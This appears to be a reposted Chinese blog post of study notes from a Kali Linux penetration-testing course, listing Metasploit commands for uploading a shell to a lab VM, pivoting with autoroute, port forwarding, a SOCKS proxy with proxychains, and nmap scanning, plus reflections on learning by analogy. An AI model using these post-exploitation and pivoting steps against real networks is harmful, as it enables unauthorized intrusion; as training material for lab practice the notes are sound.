zoukankan      html  css  js  c++  java
  • kali linux高级渗透测试第五课

    kali linux高级渗透测试

    参考资料:https://sagarbansal.com/blog/
    参考资料:https://www.youtube.com/watch?v=U_EhnbpWhUQ
    靶机资源:https://licensetopentest.com/ VM box

    sudo su root
    msfconsole
    search shell_upload

    set PASSWORD
    run
    shell
    ping 10.0.148.217 用DMZ区域的机器ping一下其他区域的
    ctrl+c 回到meterpreter型的高级shell
    run autoroute -s 10.0.148.0/24
    background
    route print

    search banner
    谷歌:how to do version detection in metasploit

    sessions -i 1
    portfwd add -l 80 -p 80 -r 10.0.148.217
    浏览器 127.0.0.1:80
    portfwd remove -l 80 -p 80 -r 10.0.148.217
    exit

    • 端口转发之所以难于理解的原因在于,脑子里面没有一个自己熟悉的东西去接受新的知识。(一切的高效思维就在这里,想办法类比,去学习新的知识)
    • 如果类比不出来,说明这中间自己已经无法想像了,需要学习与观看更多的知识面才能解决。
    • 熟悉场景:我们先注册了帐号密码提交到目标服务器以后,才能在客户端使用自己的帐号去登录。端口转发同理。我们先用得到的shell注册一条端口转发的添加命令,然后才能使用客户端去登录或者验证。

      portfwd add -l 80 -p 80 -r 10.0.148.217
      port forwarding is INDEPENDENT of setting a ROUTE 端口转发是独立的对于大背景设置路由来说(我们要习惯英语的思维,重点性描述在前,大环境上下文在后面用of连接)

    nano /etc/hosts

    nmap 127.0.0.1
    nmap -sV 127.0.0.1 -p80
    searchsploit apache
    search socks

    set SRVPORT 6666
    run
    jobs
    sessions 2
    run autoroute -s 10.0.148.0/24
    background

    浏览器 10.0.148.217
    nano /etc/proxychains.conf

    0.0.0.0 is a wildcard.
    0.0.0.0是一个通配符.

    it may not work all the times when using socks server Module of Metasploit.
    它可能不工作一直以来,当使用socks服务模块在metasploit中时。

    it is recomended to use 127.0.0.1 instead.
    它是推荐使用127.0.0.1来代替.

    proxychains curl 10.0.148.217

    proxychains curl 10.0.148.217

    proxychains wget 10.0.148.217

    sessions 2
    portfwd -h
    portfwd list
    浏览器 10.0.148.217

    nano /etc/hosts

    nano shell.php

  • 相关阅读:
    ubuntu16.04下笔记本自带摄像头编译运行PTAM
    ar的主流算法
    ubuntu下安装meshlab
    打开.py文件的方法
    Python_ip代理
    对书名的抓取
    JS动态增加删除UL节点LI及相关内容示例
    js遍历json
    js移除某一类的div
    工厂模式
  • 原文地址:https://www.cnblogs.com/sec875/p/13258686.html
Copyright © 2011-2022 走看看